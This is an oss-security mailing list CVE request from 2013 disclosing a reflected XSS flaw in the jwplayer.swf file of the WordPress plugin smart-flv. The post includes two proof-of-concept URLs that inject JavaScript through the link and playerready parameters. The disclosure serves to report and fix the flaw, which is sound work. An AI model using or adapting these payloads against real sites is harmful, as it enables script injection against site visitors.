Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20130224222359.GD23337@kludge.henri.nerv.fi>
Date: Mon, 25 Feb 2013 00:23:59 +0200
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: plugins@...dpress.org
Subject: CVE request: WordPress plugin smart-flv jwplayer.swf XSS

Hello list,

With wpscan-team I noticed that file jwplayer.swf in WordPress plugin smart-flv
is vulnerable to reflected XSS vulnerability.

URL: http://wordpress.org/extend/plugins/smart-flv/
416d0313c5f286c3a8e9daff520a9f44439b93f7 http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf

With user interaction (clicking the page):
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link
No interaction:
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29

WordPress guys could you report this to the developer since I don't know his/her
email address, thanks? Could you also tell me if there is a way to contact
plugin developers directly, thank you. Please include CVE to changelog if
possible.

--
Henri Salo
ps. http://paste.nerv.fi/36167527-horse.jpeg

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.